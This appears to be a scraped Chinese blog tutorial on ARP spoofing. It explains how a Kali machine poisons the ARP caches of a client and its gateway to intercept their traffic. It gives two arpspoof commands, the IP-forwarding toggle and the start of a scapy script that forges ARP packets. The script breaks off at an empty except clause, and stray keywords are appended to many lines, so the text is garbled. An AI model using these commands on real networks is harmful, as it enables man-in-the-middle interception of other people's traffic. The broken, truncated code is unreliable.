arp_spoof腳本的編寫

協議包分析python

 

ARP原理:緩存

 

 

在PC1 訪問 Server 的流量 要通過網關  也就是 192.168.1.254blog

 

欺騙原理:pc1  與 網關 創建 MAC  ARP 緩存ip

 

咱們將KALI 攻擊機的 MAC 發給 pc 1 告訴   此時 ARP關係 與KALI 進行創建 import

arpspoof - i eth0 -t 192.168.1.254 192.168.1.1   把本身的MAC 發給  192.168.1.1  以網關的身份發過去 -- 192.168.1.254 - 192.168.1.1 這裏會更改 用戶的 MAC ARP緩存 原理

arpspoof - i eth0 -t  192.168.1.1    192.168.1.254   把本身的MAC 發給 192.168.1.254 以用戶的身份發過去 告訴網關 咱們纔是用戶        --   192.168.1.1 - 192.168.1.254  這裏會更改 網關的MAC ARP緩存psr

 這樣 192.168.1.1 請求的 結果 就會返回給 KALI  KALI 再發給 網關請求

網關獲得的結果 發給客戶端   也會返回KALI  KALI 再發給客戶端im

在kali 下操做 須要 echo 1 > /proc/sys/net/ipv4/ip_forward客戶端

 

 腳本編寫:

利用python 

scapy 模塊

 

 

 

 

包:pkt=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip1,psrc=ip2)

       sendp(pkt)

 

import sys

import time

from scapy.all import *

def arp_spoof(ip1,ip2):

  try:

    pkt=Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip1,psrc=ip2)

    sendp(pkt)

  except:

相關文章
相關標籤/搜索